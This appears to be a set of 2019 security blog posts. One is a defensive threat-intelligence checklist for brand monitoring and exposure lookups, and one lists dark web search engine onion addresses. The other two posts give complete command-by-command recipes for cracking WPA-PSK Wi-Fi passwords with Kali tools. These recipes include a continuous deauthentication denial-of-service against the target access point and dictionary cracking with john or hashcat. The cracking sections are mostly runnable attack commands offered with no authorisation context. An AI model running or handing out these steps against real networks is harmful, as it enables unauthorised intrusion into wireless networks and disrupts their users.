Thursday, June 20, 2019

[Threat Intelligence] Three more lookup items that should be checked for Threat Intelligence

1)      Brand Protection & Monitoring
Periodically determine if there is any malicious website faking the company to conduct phishing activities.

Search Engines: Google, Bing, and Yahoo

Checklist:
1.1) Check if there are any websites using similar top-level domain names to fake the company.
1.2) Check whether there are any other websites faking the company in the Internet.




2)      Passive Internet-faced Vulnerability Lookup
Regularly look up those cyberspace search engines in order to discovery those Internet-faced vulnerabilities associated with the company.

Search Engines: Shodan (shodan.io) and ZoomEye (zoomeye.org)

Checklist:
       2.1) Search keywords “XXXX” and “XXXX”, respectively.
       2.2) Check if there is any vulnerability linked to the aforementioned two domains.




3)   Internet Asset Blacklist/Reputation Checking
Periodically check if the company's domains are sitting in SPAM/Reputational Blacklists.

Search Engines: VirusTotal (https://www.virustotal.com/gui/home/url) and Talos Intelligence (https://www.talosintelligence.com/reputation_center/)

Friday, June 14, 2019

[Threat Intelligence] Five famous Dark Web search engines

torch xmh57jrzrnw6insl.onion Ahmia msydqstlz2kzerdg.onion candle gjobqjj7wyczbqie.onion not Evil hss3uro2hsxfogfq.onion haystak haystakvxad7wbk5.onion onionland 3bbaaaccczcbdddz.onion

Crack WPA-PSK with Kali [Plan B]

1):
airmon-ng

2)Start Monitoring mode:
airmon-ng start wlan0

3):
airodump-ng wlan0mon

4)Capture frames:
airodump-ng --bssid BSSID_OF_AP -c CHANNEL -w FILE_NAME wlan0mon

5)Launch Unauthentication DoS:
aireplay-ng -0 0 -a BSSID_OF_AP wlan0mon

6)Stop Monitoring mode:
airmon-ng stop wlan0mon

7):
aircrack-ng CAP_FILE_PATH -J john

8):
hccap2john john.hccap > wpa

9):
john --wordlist=/usr/share/wordlists/rockyou.txt ./wpa

Crack WPA-PSK with Kali

1):
airmon-ng

2)Start Monitoring mode:
airmon-ng start wlan0

3):
airodump-ng wlan0mon

4)Capture frames:
airodump-ng --bssid BSSID_OF_AP -c CHANNEL -w FILE_NAME wlan0mon

5)Launch Unauthentication DoS:
aireplay-ng -0 0 -a BSSID_OF_AP wlan0mon

6)Stop Monitoring mode:
airmon-ng stop wlan0mon

7)Go to https://hashcat.net/cap2hccapx/ and upload the PCAP in order to have the HCCAPX file.

8):
hashcat -m 2500 -a 0 HCCAPX_FILE_PATH /usr/share/wordlists/rockyou.txt --force